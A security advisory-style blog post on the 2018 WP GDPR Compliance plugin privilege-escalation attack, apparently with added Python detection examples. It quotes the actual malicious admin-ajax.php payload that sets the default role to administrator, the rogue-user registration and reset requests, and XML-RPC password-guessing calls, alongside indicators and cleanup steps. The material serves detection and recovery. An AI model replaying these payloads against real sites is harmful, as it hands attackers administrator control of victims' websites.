WordPress WP GDPR Compliance Privilege Escalation Exploit

Author: gryzli

Two days ago (on November 08 2018) a nasty exploit was identified in the popular WP GDPR Compliance WordPress plugin; it leads to privilege escalation.

The plugin has more than 100,000 active installations.

All versions prior to 1.4.3 are vulnerable to the exploit; 1.4.3 is the fixed release.

 

What is the actual vulnerability?

More information about the vulnerability itself can be found here:

https://wpvulndb.com/vulnerabilities/9144

WordFence

 

How to identify the attack?

The actual attack happens in several stages.

 

First, attackers try to enable site registrations and set the default role for new users to 'Administrator'.

This is done with a POST request to your wp-admin/admin-ajax.php.

The request looks like this (this is a real malicious request):

Host:XXXXXX.COM

Accept-Encoding:gzip

Content-Length:188

Content-Type:application/x-www-form-urlencoded

Referer:http://XXXXXX.COM/wp-login.php?action=rp

User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

BODY: action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22default_role%22%2C%22value%22+%3A%22administrator%22%7D&security=1e35284ab4

 

Second, attackers try to register a new user.

Most of the attacks in the wild try to register one of the following two users:

t2trollherten

t3trollherten

 

The real POST request looks like this:

Request_URI: http://XXXXXX.COM/wp-login.php?action=register

BODY:

redirect_to=&user_email=trollherten%40mail.com&user_login=t2trollherten&wp-submit=Register

 

Third (optional): trying to reset the new user's password

We have seen some attempts by attackers to reset the malicious user's password.

 

The request looks like this: 

Cookie: wordpress_test_cookie=WP+Cookie+check; path=/;wp-resetpass-464755d4cc9c2c0d7cc2b015eb2b7c0a=t2trollherten%3A76cnn4sryixU82wtCG9j; path=/wp-login.php; httponly;

URI: /wp-login.php?action=resetpass

BODY:

pass1=0rt8Ka7slborUi&pass1-text=0rt8Ka7slborUi&pass2=0rt8Ka7slborUi&rp_key=76cnn4sryixU82wtCG9j&wp-submit=Reset%2BPassword

 

At this point the attacker already has an administrator user created.
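An added example (not code from the original post) that decodes the stage-1 and stage-2 request bodies quoted above and flags the ones matching this attack. The sample bodies are the ones shown above, the watched option names and user names come from this post, and the function names are my own.

```python
import json
from urllib.parse import parse_qs

# Constructed samples: the stage-1 admin-ajax body and the stage-2 register body quoted above.
STAGE1_BODY = ("action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse"
               "%2C%22option%22%3A%22default_role%22%2C%22value%22+%3A%22administrator%22%7D&security=1e35284ab4")
STAGE2_BODY = "redirect_to=&user_email=trollherten%40mail.com&user_login=t2trollherten&wp-submit=Register"

# Options an attacker flips to turn open registration into administrator access (per the post).
WATCHED_OPTIONS = {"default_role", "users_can_register"}
# Logins seen in the wild per the post; "superuser" is the one Sucuri reported (see the update below).
KNOWN_BAD_LOGINS = {"t2trollherten", "t3trollherten", "superuser"}


def first(fields, name):
    """Return the first value of a form field, or '' when the field is absent."""
    return fields.get(name, [""])[0]


def classify_admin_ajax(body):
    """Decode a POST body sent to wp-admin/admin-ajax.php and report whether it is a
    wpgdprc_process_action save_setting call that touches a watched option."""
    fields = parse_qs(body, keep_blank_values=True)
    verdict = {"suspicious": False, "reason": "", "option": None, "value": None}
    if first(fields, "action") != "wpgdprc_process_action":
        return verdict
    try:
        data = json.loads(first(fields, "data"))  # the plugin takes its arguments as a JSON blob
    except json.JSONDecodeError:
        verdict.update(suspicious=True, reason="wpgdprc action with undecodable data")
        return verdict
    if not isinstance(data, dict):
        data = {}
    verdict.update(option=data.get("option"), value=data.get("value"))
    if data.get("type") == "save_setting" and verdict["option"] in WATCHED_OPTIONS:
        verdict.update(suspicious=True,
                       reason="save_setting on %s -> %r" % (verdict["option"], verdict["value"]))
    return verdict


def classify_register(body):
    """Decode a POST body sent to wp-login.php?action=register and flag known attacker logins."""
    fields = parse_qs(body, keep_blank_values=True)
    login = first(fields, "user_login")
    return {"login": login, "email": first(fields, "user_email"),
            "suspicious": login in KNOWN_BAD_LOGINS}
```

Access logs normally do not record POST bodies, so this is meant for a WAF, a reverse proxy with body logging, or a mu-plugin hooked early in the request.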

 

What malicious actions do attackers take after exploiting the website?

Different approaches have been reported, but most of the damage includes:

  • Adding malicious administrator users to the database
  • Breaking websites by changing the "site_url" in WP settings, for black hat SEO
  • Adding malicious cron jobs
  • Infecting existing files with shells
  • Uploading new web shells into the website document root
  • Adding crontab entries that reinfect the account
  • Installing malicious WP plugins

Basically, at this stage (when the attacker has access to the account), they can do all kinds of harm.

 

How to clean the website after successful exploitation?

!!! Before doing any recovery on your website, make sure you have updated WP GDPR Compliance to its latest fixed version, 1.4.3 !!!

1) Restore everything from a recent backup

This is the most effective action you can take to clean out your WP site.

We have traces of the attack starting from 08 November, so it would be best if you can restore your WordPress files and database from a date before 08 November.

In case you don't have any backup, you can try some of the following remedies.

 

2) Search for newly added users in your database and remove them

Inside your database, in the wp_users table, you can search for newly created users.

So far, we have seen the following two users actively injected into the database:

+----+---------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+---------------+
| ID | user_login    | user_pass                          | user_nicename | user_email           | user_url | user_registered     | user_activation_key | user_status | display_name  |
+----+---------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+---------------+
| 20 | t2trollherten | $P$ByTG6qJi/eGVCRB2i.n/wS80Y967ng/ | t2trollherten | trollherten@mail.com |          | 2018-11-08 13:43:38 |                     |           0 | t2trollherten |
| 21 | t3trollherten | $P$Bb7f2NV78UD2/nNpB6aKCStQnit99l1 | t3trollherten | t3trollherten@bk.ru  |          | 2018-11-08 15:58:44 |                     |           0 | t3trollherten |
+----+---------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+---------------+

 

Update:

Another user reported by Sucuri as a malicious one inserted into the database is "superuser".

3) Search for newly created files in your hosting account

If you have multiple sites in the same account, you had better search the whole account rather than just the hacked website directory.

You could try searching with find for files added or modified in the last few days:

# This lists files modified in the last 3 days ("-mtime -3"); note that "-mtime +3" would do the opposite and list files older than 3 days.

find . -type f -mtime -3

 

4) Review your installed WordPress plugins for suspicious ones and delete them

Check whether you have any suspicious newly installed WP plugins and remove them.

 

5) Check your system user cron jobs for suspicious ones
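An added example for step 2 (not from the original post): the query a practitioner would run against the live database to list administrator accounts registered on or after the first day of the attack wave, run here against an in-memory SQLite stand-in. The rows are constructed (the two from the table above plus a legitimate admin and a subscriber), the default "wp_" table prefix is assumed, and the function names are my own.

```python
import sqlite3

# Constructed sample of the two WordPress tables the check needs: wp_users and wp_usermeta.
SAMPLE_USERS = [
    (1, "siteowner", "owner@example.org", "2016-03-01 10:00:00"),
    (19, "reader", "reader@example.org", "2018-11-09 09:12:00"),
    (20, "t2trollherten", "trollherten@mail.com", "2018-11-08 13:43:38"),
    (21, "t3trollherten", "t3trollherten@bk.ru", "2018-11-08 15:58:44"),
]
SAMPLE_USERMETA = [  # wp_capabilities holds a PHP-serialized array; the role name inside it is what matters
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (19, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'),
    (20, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (21, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]

# The same query works on the live MySQL database; "wp_" is the default table (and meta_key) prefix.
FIND_NEW_ADMINS = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%"administrator"%'
  AND u.user_registered >= ?
ORDER BY u.user_registered
"""


def build_sample_db():
    """Create an in-memory stand-in for the two tables, with only the columns the query uses."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_email TEXT, user_registered TEXT)")
    db.execute("CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT)")
    db.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    db.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?)", SAMPLE_USERMETA)
    return db


def find_new_admins(db, since="2018-11-08 00:00:00"):
    """Return (ID, login, email, registered) for admin accounts registered on or after the cutoff."""
    return db.execute(FIND_NEW_ADMINS, (since,)).fetchall()
```

Any account this returns that you did not create yourself should be removed, and the remaining administrators should have their passwords reset.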

 

 

IP addresses doing exploitation in the wild

Until now we have seen the following IP addresses exploiting the vulnerability in the wild:

109.234.39.250
109.234.37.214
46.39.65.176
195.123.213.91

 

UPDATE (13 Nov 2018)

Right now we are seeing a big wave of /xmlrpc.php requests that try to guess the passwords of the malicious users.

Attackers are trying to get control over already infected websites.

The requests look like this:

URI: /xmlrpc.php

BODY:

<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>wp.getProfile</methodName>
<params>
<param><value>9999</value></param>
<param><value>t2trollherten</value></param>
<param><value>0rt8Ka7slborUi</value></param>
</params>
</methodCall>
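An added example (not code from the original post) that parses XML-RPC methodCall bodies like the one above and counts credential-bearing calls per username, which is the signal to watch for in this password-guessing wave. The first sample is the request quoted above; the other samples are constructed, the USERNAME_INDEX mapping relies on the documented WordPress signatures wp.getProfile(blog_id, username, password) and wp.getUsersBlogs(username, password), and the function names are my own.

```python
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed samples: the wp.getProfile call quoted above, two further guesses, and a harmless call.
SAMPLE_CALLS = [
    '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>wp.getProfile</methodName>'
    '<params><param><value>9999</value></param><param><value>t2trollherten</value></param>'
    '<param><value>0rt8Ka7slborUi</value></param></params></methodCall>',
    '<?xml version="1.0"?><methodCall><methodName>wp.getProfile</methodName><params>'
    '<param><value><int>1</int></value></param><param><value><string>t2trollherten</string></value></param>'
    '<param><value><string>Passw0rd!</string></value></param></params></methodCall>',
    '<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params>'
    '<param><value>t3trollherten</value></param><param><value>hunter2</value></param></params></methodCall>',
    '<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params/></methodCall>',
]

# Position of the username parameter in WordPress XML-RPC methods that carry credentials:
# wp.getProfile(blog_id, username, password) as seen above, wp.getUsersBlogs(username, password).
USERNAME_INDEX = {"wp.getProfile": 1, "wp.getUsersBlogs": 0}


def parse_methodcall(xml_text):
    """Return (methodName, [param values]) for an XML-RPC methodCall body.
    A <value> may wrap a typed child (<string>, <int>) or hold bare text, as in the request above."""
    root = ET.fromstring(xml_text)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    method = root.findtext("methodName", default="").strip()
    params = []
    for value in root.iterfind("params/param/value"):
        typed = list(value)
        text = typed[0].text if typed else value.text
        params.append((text or "").strip())
    return method, params


def count_login_guesses(bodies):
    """Count credential-bearing calls per username across a batch of /xmlrpc.php POST bodies."""
    guesses = Counter()
    for body in bodies:
        try:
            method, params = parse_methodcall(body)
        except (ET.ParseError, ValueError):
            continue  # malformed bodies are not counted as guesses
        idx = USERNAME_INDEX.get(method)
        if idx is not None and len(params) > idx:
            guesses[params[idx]] += 1
    return guesses
```

A burst of such calls against a login you never created is a sign the site was hit by the earlier stages; if you do not use XML-RPC at all, blocking /xmlrpc.php at the web server removes this surface entirely.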

Useful external resources

https://blog.sucuri.net/2018/11/erealitatea-net-hack-corrupts-websites-with-wp-gdpr-compliance-plugin-vulnerability.html

https://wordpress.org/support/topic/important-update-to-1-4-3-immediately/

 

WordFence Report
